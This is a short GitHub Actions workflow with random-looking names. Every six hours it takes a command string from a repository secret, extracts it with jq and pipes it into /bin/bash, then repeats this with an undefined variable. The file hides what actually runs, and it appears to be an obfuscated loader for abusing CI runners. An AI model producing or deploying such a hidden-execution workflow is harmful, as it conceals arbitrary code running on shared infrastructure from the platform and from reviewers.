name: outlyingdull
on:
  workflow_dispatch:
  schedule:
    - cron: '48 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: outlyingdull
        env:
          t89: ${{ secrets.t89 }}
        run: |
          echo $t89 | jq -r .rk50 | /bin/bash
          echo $egtys36 | jq -r .acu298 | /bin/bash

